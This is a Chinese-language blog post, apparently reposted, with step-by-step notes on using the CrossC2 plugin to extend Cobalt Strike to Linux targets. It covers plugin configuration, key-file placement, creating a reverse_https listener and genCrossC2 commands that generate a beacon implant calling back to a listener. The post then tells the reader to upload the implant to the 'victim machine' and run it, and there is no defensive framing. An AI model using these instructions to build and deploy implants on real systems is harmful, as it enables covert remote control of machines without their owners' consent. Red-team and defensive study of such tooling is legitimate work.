栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

CobaltStrike 之 Linux上线笔记 (CrossC2插件使用)

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

CobaltStrike 之 Linux上线笔记 (CrossC2插件使用)

CobaltStrike 默认是不支持Linux 的上线,有一款插件解决了一个问题。就是GitHub的一个项目——CrossC2,以下就介绍一下这款插件的配置和使用。

一、插件配置

项目地址:https://github.com/gloxec/CrossC2

将这两个文件下载下来,创建一个文件夹,并放置文件夹下

修改 CrossC2-GithubBot-2021-11-02.cna

修改**$CC2_PATH**为真实路径,对应本地存放的CrossC2路径。注意最后的 /修改$CC2_BIN 为payload生成程序赋予genCrossC2.Linux 执行权限
加载cna 脚本

Cobalt Strike --script Manager – load
导入成功后就会多一个菜单 CrossC2

服务端自动生成 .cobaltstrike.beacon_keys,如果没有重新导入几次,然后把给个文件放到CrossC2插件文件夹下,这个文件很重要,是CS的密钥文件,因为CrossC2插件仅支持 reverse_https 协议

Linux上线 设置监听器

因为CeossC2仅支持 reverse_https 所以只能创建 reverse_https监听器

生成pyaload

尝试多次生成payload,虽然日志现实已经在 /tmp 生成,但是没有发现

手动生成
生成语法:

CS4.4:
genCrossC2 127.0.0.1 4444 cs_key null Linux x64 ./a.out stager 4.4
CS4.0~4.3:
genCrossC2 127.0.0.1 4444 cs_key null Linux x64 ./a.out

将生成的文件上传至受害机器 并执行
成功上线

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/751538.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号